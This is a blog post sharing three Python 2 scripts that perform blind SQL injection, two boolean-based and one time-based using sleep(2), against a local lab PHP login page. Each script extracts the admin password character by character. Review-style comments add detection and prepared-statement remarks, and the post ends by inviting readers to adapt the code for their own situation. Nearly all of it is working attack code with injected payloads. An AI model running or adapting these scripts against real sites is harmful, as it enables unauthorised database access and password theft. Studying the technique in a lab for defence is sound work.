
Python Blind,Time Based SQL Injection Source

category Coding/Python 2014. 6. 15. 04:36

GET.py


POST TIME.py


POST.py


 

[GET]


import httplib

import urllib

# Boolean-based blind SQL injection demo against a local lab page
# (127.0.0.1, /pytest/get_ok.php). Each request places one character guess in
# the `id` query parameter; a response body containing 'Hello' is treated as
# "the guess was right".
# NOTE(review): the server-side PHP is not shown. The technique only works if
# that page builds its SQL by concatenating `id` into the query string; bound
# parameters / prepared statements on the server remove the oracle.
# Defender's view: a run is a long burst of near-identical requests whose `id`
# value contains ascii(substr(...)) with a changing position and number, which
# typically stands out in access logs and WAF telemetry.
result=''
length=1  # highest position still worth probing; grows by one per recovered character
string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

# Session cookie is hard-coded for the author's own lab session.
req_headers={'Cookie':'PHPSESSID=nb978enqqm4teudnsp27vi9i25','Content-Type':'application/x-www-form-urlencoded'}

for pos in range(1,100):
    # The previous position produced no match, so stop here.
    if length<pos:
        break
    for idx,ch in enumerate(string):
        path=''.join([
            "/pytest/get_ok.php?id=admin'%20and%20ascii(substr(pw,",
            str(pos),
            ",1))=",
            str(ord(ch)),
            "%23&password=a",
        ])
        http=httplib.HTTPConnection('127.0.0.1')
        http.request('GET',path,'',req_headers)
        body=http.getresponse().read()
        if 'Hello' not in body:
            print str(pos)+' -> '+ch
            continue
        result+=ch
        # NOTE(review): this prints the index into `string`, not the matched character.
        print str(pos)+' Password is '+str(idx)
        print result
        length+=1
        break

print 'Password is '+result




 

[POST]


import httplib

import urllib

# Boolean-based blind SQL injection demo, POST variant, against a local lab
# login page (127.0.0.1, /pytest/login_ok.php). The character guess travels in
# the `id` form field; a response body containing 'Hello' is treated as a
# correct guess.
# NOTE(review): the server-side PHP is not shown. This presumes the login
# query is assembled by string concatenation from `id`; prepared statements
# with bound parameters close the hole.
# Defender's view: POST bodies are often absent from access logs, so detection
# usually needs request-body inspection (WAF / application logging) or
# rate-based alerts on repeated login attempts from one session.
result=""
length=1  # highest position still worth probing; grows by one per recovered character
string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

# Session cookie is hard-coded for the author's own lab session.
req_headers={'Cookie':'PHPSESSID=j57q0n53cl5qhi1dhg527pq7o5','Content-Type':'application/x-www-form-urlencoded'}

for pos in range(1,100):
    # The previous position produced no match, so stop here.
    if length<pos:
        break
    for idx,ch in enumerate(string):
        id_value="admin' and ascii(substr(pw,"+str(pos)+",1))="+str(ord(ch))+"#"
        form=urllib.urlencode({"id":id_value,"pw":"1"})
        http=httplib.HTTPConnection('127.0.0.1')
        http.request('POST','/pytest/login_ok.php',form,req_headers)
        body=http.getresponse().read()
        if 'Hello' not in body:
            print str(pos)+' -> '+ch
            continue
        result+=ch
        # NOTE(review): this prints the index into `string`, not the matched character.
        print str(pos)+' Password is '+str(idx)
        print result
        length+=1
        break

print 'Password is '+result


 

 

[POST - Time Based]

 

import httplib

import urllib

import time

# Time-based blind SQL injection demo against a local lab login page
# (127.0.0.1, /pytest/login_ok.php). The injected condition calls sleep(2)
# when the guessed character matches, so the script uses the request's
# wall-clock duration (>= 2 seconds) as the signal instead of the page content.
# NOTE(review): the server-side PHP is not shown. This presumes `id` is
# concatenated into the SQL text; bound parameters remove the injection point.
# Defender's view: form fields carrying `sleep(` and a login endpoint that
# intermittently takes 2 s or more to answer are the signals to alert on; a
# database statement timeout also limits what a delay can reveal.
result=""
length=1  # highest position still worth probing; grows by one per recovered character
string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

# Session cookie is hard-coded for the author's own lab session.
req_headers={'Cookie':'PHPSESSID=ac7f41c5fc30d8c8d1f4dbc0fbbc0f04','Content-Type':'application/x-www-form-urlencoded'}

for pos in range(1,100):
    # The previous position produced no match, so stop here.
    if length<pos:
        break
    for ch in string:
        id_value="admin' and if(ascii(substr(pw,"+str(pos)+",1))="+str(ord(ch))+",sleep(2),0)#"
        form=urllib.urlencode({"id":id_value,"password":"1"})
        # The timed window covers connection setup, the request and the full body read.
        started=time.time()
        http=httplib.HTTPConnection('127.0.0.1')
        http.request('POST','/pytest/login_ok.php',form,req_headers)
        http.getresponse().read()
        finished=time.time()
        print str(pos)+' -> '+ch
        if (finished-started)<2:
            continue
        result+=ch
        print str(pos)+' Password is '+ch
        print result
        length+=1
        break
    # NOTE(review): unlike the GET and POST listings on this page, this summary
    # line sits inside the position loop, so it prints once per probed position.
    print 'Password is '+result


 

상황에 맞게 수정하여 쓰면 된다.


